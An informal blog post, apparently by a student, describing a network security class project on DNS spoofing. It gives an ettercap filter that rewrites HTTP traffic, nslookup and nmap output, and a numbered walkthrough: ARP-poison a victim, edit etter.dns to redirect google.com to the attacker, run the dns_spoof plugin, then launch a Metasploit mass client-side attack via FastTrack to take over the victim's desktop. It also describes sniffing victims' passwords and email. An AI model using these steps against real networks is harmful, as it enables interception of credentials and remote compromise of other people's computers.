I Did a lots of research for my tiny network security project group regarding this topic..while other groups just present the basic security ...So here...we start from the basic
First you need to know what is DNS . I try to narrow the scope...DNS spoofing is kind of modification attack , where we steal the packet/s transmit and change it according to what we want.IF you googling around ,you will found that the basic of dns spoofing can be easily obtained/practice using ettercap . You should able to grap the basic using this howto .
If you install the ettercap , it only provides the basic of 'man in the middle' stuffs . For advance usage ,try to play around with filter ...example given here
filter -->
if (ip.proto == TCP && tcp.dst == 80) {
if (search(DATA.data, "Accept-Encoding")) {
replace("Accept-Encoding", "Accept-Rubbish!");
# note: replacement string is same length as original string
msg("zapped Accept-Encoding!\n");
}
}
if (ip.proto == TCP && tcp.src == 80) {
msg("in Second IF\n");
if (search(DECODED.data, "Hello")){
replace("Hello", "12345");
msg("run\n");
}
if (search(DATA.data, "Google")){
replace("Google", "GOOGLE HACKED");
msg("run2\n");
}
}
ExamPLE
DAILY FUN
now where were we...ok..You can play around ettercap with wireshack ..it really fun because while you a poisoning a specific machine ...you are able to read the message or any kind of text he post to the network by using wireshack(example : text that i'm writing here..LOL) ..it apply to private data such as username and password too...even the basic ettercap able to capture email private data ... the most popular testing email use is gmail,don't really sure why though .....other tools that you might be interest are
nslookup -look for ip specific website
Note that you can get more data if you run nslookup with specific ip
[ reez @ alexendeRReez : /home/reez/Desktop ] nslookup irongeek.com
Server: 10.0.7.254
Address: 10.0.7.254#53
Non-authoritative answer:
Name: irongeek.com
Address: 208.97.169.250
[ reez @ alexendeRReez : /home/reez/Desktop ] nslookup 208.97.169.250
Server: 10.0.7.254
Address: 10.0.7.254#53
Non-authoritative answer:
250.169.97.208.in-addr.arpa name = apache2-linus.lankershim.dreamhost.com.
Authoritative answers can be found from:
169.97.208.in-addr.arpa nameserver = NS3.dreamhost.com.
169.97.208.in-addr.arpa nameserver = NS1.dreamhost.com.
169.97.208.in-addr.arpa nameserver = NS2.dreamhost.com.
Nmap - Network scanner
This sometimes might be just simple vanurable scanner ...but at the same time..is really dangerous ...there are a many option provided
[ reez @ alexendeRReez : /home/reez/Desktop ] nmap -help
Nmap 4.68 ( http://nmap.org )
Usage: nmap [Scan Type(s)] [Options] {target specification}
TARGET SPECIFICATION:
Can pass hostnames, IP addresses, networks, etc.
Ex: scanme.nmap.org, microsoft.com/24, 192.168.0.1; 10.0.0-255.1-254
-iL: Input from list of hosts/networks
-iR: Choose random targets
--exclude: Exclude hosts/networks
--excludefile: Exclude list from file
HOST DISCOVERY:
-sL: List Scan - simply list targets to scan
-sP: Ping Scan - go no further than determining if host is online
-PN: Treat all hosts as online -- skip host discovery
-PS/PA/PU [portlist]: TCP SYN/ACK or UDP discovery to given ports
-PE/PP/PM: ICMP echo, timestamp, and netmask request discovery probes
-PO [protocol list]: IP Protocol Ping
-n/-R: Never do DNS resolution/Always resolve [default: sometimes]
--dns-servers: Specify custom DNS servers
--system-dns: Use OS's DNS resolver
SCAN TECHNIQUES:
-sS/sT/sA/sW/sM: TCP SYN/Connect()/ACK/Window/Maimon scans
-sU: UDP Scan
-sN/sF/sX: TCP Null, FIN, and Xmas scans
--scanflags: Customize TCP scan flags
-sI: Idle scan
-sO: IP protocol scan
-b: FTP bounce scan
--traceroute: Trace hop path to each host
--reason: Display the reason a port is in a particular state
PORT SPECIFICATION AND SCAN ORDER:
-p: Only scan specified ports
Ex: -p22; -p1-65535; -p U:53,111,137,T:21-25,80,139,8080
-F: Fast mode - Scan fewer ports than the default scan
-r: Scan ports consecutively - don't randomize
--top-ports: Scan most common ports
--port-ratio: Scan ports more common than
SERVICE/VERSION DETECTION:
-sV: Probe open ports to determine service/version info
--version-intensity: Set from 0 (light) to 9 (try all probes)
--version-light: Limit to most likely probes (intensity 2)
--version-all: Try every single probe (intensity 9)
--version-trace: Show detailed version scan activity (for debugging)
SCRIPT SCAN:
-sC: equivalent to --script=default
--script=: is a comma separated list of
directories, script-files or script-categories
--script-args=: provide arguments to scripts
--script-trace: Show all data sent and received
--script-updatedb: Update the script database.
OS DETECTION:
-O: Enable OS detection
--osscan-limit: Limit OS detection to promising targets
--osscan-guess: Guess OS more aggressively
TIMING AND PERFORMANCE:
Options which take
ADVANCES
enough with the craps...ok..lets see...how i apply in real situation (my tiny network security project)
1. Open Ettercap
#ettercap -G
2. Go to option = Sniff -> Unified sniffing
3. Scan for host to get lists of LAN connections in LAN using option = Hosts -> Scan for hosts
4. Set the target; usually choose one IP as victim IP, and its DNS server example
Victim’s IP: 164.0.3.47
Server’s IP: 164.0.3.254
5. We launch the MiTM attacks which is ARP (Address Resolution Protocol) poisoning.
6. Then, check difference packet capture in victim computer using Wireshark before launching the
MiTM attack and when it is still occurring.
7. i) Edit file, usually name: /usr/local/share/ettercap/etter.dns
ii) Point the target URL to our IP address (intend to spoof but as we are demonstrating Mass Client
Side Attack , we point the URL to the Attacker IP address).
Example:
google.com A
*.google.com A
www.google.com PTR
iii) Close and save the text file.
In Ettercap GUI(Graphical User Interface)tools, check the available plugins by clicking DNS
spoofing or by using command line
Ettercap –T –q –M arp:remote –P dns_spoof //
8. Check the IP address using Nslookup again and it will give difference output compare to the initial
Nslookup test before starting MiTM attack in the previous steps (Cmd/windows terminal
) as it should point to the Attacker IP address.
9. It is mean whenever victim open browser to browse google.com, it will redirect to the Attacker IP
Address.
10. Open the FastTrack application which is listed under Penetration in the BackTrack Operating
System.
11. At the Shell FastTrack Main Menu, choose the number 2 option for: External Hacking. Then, you
must select number 7 option for: Metaspoit Mass Client-Side Attack.
12. Check the IP address using ipconfig(windows) or ifconfig(Linux)
13. Next thing to do is entering IP address for Apache and press the enter button.
14. When the victim browse google.com, it will redirect victim to Attacker IP address (9) and the
attacker starts to attack.
15. We have to wait until the Framework connects to the system. After that, we are able to remote
victim desktop and modified anything as we wish.
I Will explain about Framework in other post....so see you in next post...You might want to googling around for other example...
WooT!
0 comments:
Post a Comment